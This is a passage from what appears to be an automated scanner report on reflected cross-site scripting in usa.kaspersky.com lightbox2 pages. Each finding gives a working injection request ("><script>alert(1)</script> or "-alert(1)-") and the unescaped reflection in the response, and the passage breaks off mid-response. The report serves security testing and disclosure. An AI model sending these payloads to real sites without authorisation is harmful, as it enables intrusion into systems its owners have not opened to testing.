This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5769/lightbox2d93a4"><script>alert(1)</script>1c7077008e7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:48:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687319"
Content-Type: text/html; charset=utf-8
Content-Length: 28888
Date: Sat, 18 Dec 2010 15:48:54 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5769/lightbox2d93a4"><script>alert(1)</script>1c7077008e7" />
...[SNIP]...

1.180. http://usa.kaspersky.com/node/5769/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5769/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c38d"><script>alert(1)</script>e3cfe51d09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5769/lightbox2?1c38d"><script>alert(1)</script>e3cfe51d09f=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:41:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686885"
Content-Type: text/html; charset=utf-8
Content-Length: 13452
Date: Sat, 18 Dec 2010 15:41:40 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5769/lightbox2?1c38d"><script>alert(1)</script>e3cfe51d09f=1" />
...[SNIP]...

1.181. http://usa.kaspersky.com/node/5770/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39ceb"-alert(1)-"4b1f9c30911 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node39ceb"-alert(1)-"4b1f9c30911/5770/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687044"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:44:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node39ceb"-alert(1)-"4b1f9c30911/5770/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.182. http://usa.kaspersky.com/node/5770/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201ee"><script>alert(1)</script>01824e17973 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node201ee"><script>alert(1)</script>01824e17973/5770/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687027"
Content-Type: text/html; charset=utf-8
Content-Length: 30161
Date: Sat, 18 Dec 2010 15:43:52 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node201ee"><script>alert(1)</script>01824e17973/5770/lightbox2" />
...[SNIP]...

1.183. http://usa.kaspersky.com/node/5770/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e363e"><script>alert(1)</script>0f22671b364 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5770e363e"><script>alert(1)</script>0f22671b364/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687132"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:45:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5770e363e"><script>alert(1)</script>0f22671b364/lightbox2" />
...[SNIP]...

1.184. http://usa.kaspersky.com/node/5770/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93c8d"-alert(1)-"3bd0663022a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/577093c8d"-alert(1)-"3bd0663022a/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687151"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:46:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/577093c8d"-alert(1)-"3bd0663022a/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.185. http://usa.kaspersky.com/node/5770/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 557a8"><script>alert(1)</script>5f9dfb8104c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5770/lightbox2557a8"><script>alert(1)</script>5f9dfb8104c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:48:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687322"
Content-Type: text/html; charset=utf-8
Content-Length: 28621
Date: Sat, 18 Dec 2010 15:48:57 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5770/lightbox2557a8"><script>alert(1)</script>5f9dfb8104c" />
...[SNIP]...

1.186. http://usa.kaspersky.com/node/5770/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5770/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a8b"><script>alert(1)</script>a54d954d57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5770/lightbox2?92a8b"><script>alert(1)</script>a54d954d57e=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:41:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686901"
Content-Type: text/html; charset=utf-8
Content-Length: 13185
Date: Sat, 18 Dec 2010 15:41:48 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5770/lightbox2?92a8b"><script>alert(1)</script>a54d954d57e=1" />
...[SNIP]...

1.187. http://usa.kaspersky.com/node/5771/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c8dc"><script>alert(1)</script>a9267f47404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node4c8dc"><script>alert(1)</script>a9267f47404/5771/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687038"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:44:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node4c8dc"><script>alert(1)</script>a9267f47404/5771/lightbox2" />
...[SNIP]...

1.188. http://usa.kaspersky.com/node/5771/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd43b"-alert(1)-"bf815984384 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodebd43b"-alert(1)-"bf815984384/5771/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687051"
Content-Type: text/html; charset=utf-8
Content-Length: 30065
Date: Sat, 18 Dec 2010 15:44:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodebd43b"-alert(1)-"bf815984384/5771/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.189. http://usa.kaspersky.com/node/5771/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cff1"-alert(1)-"5a73d9cfdd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57715cff1"-alert(1)-"5a73d9cfdd3/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687166"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:46:18 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57715cff1"-alert(1)-"5a73d9cfdd3/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.190. http://usa.kaspersky.com/node/5771/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60110"><script>alert(1)</script>48aa6ee31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/577160110"><script>alert(1)</script>48aa6ee31a/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687139"
Content-Type: text/html; charset=utf-8
Content-Length: 29392
Date: Sat, 18 Dec 2010 15:45:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/577160110"><script>alert(1)</script>48aa6ee31a/lightbox2" />
...[SNIP]...

1.191. http://usa.kaspersky.com/node/5771/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582bc"><script>alert(1)</script>8012a832712 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5771/lightbox2582bc"><script>alert(1)</script>8012a832712 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:48:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687328"
Content-Type: text/html; charset=utf-8
Content-Length: 28994
Date: Sat, 18 Dec 2010 15:49:01 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5771/lightbox2582bc"><script>alert(1)</script>8012a832712" />
...[SNIP]...

1.192. http://usa.kaspersky.com/node/5771/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5771/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2ce1"><script>alert(1)</script>5d33dadea42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5771/lightbox2?d2ce1"><script>alert(1)</script>5d33dadea42=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:41:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686909"
Content-Type: text/html; charset=utf-8
Content-Length: 13558
Date: Sat, 18 Dec 2010 15:42:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

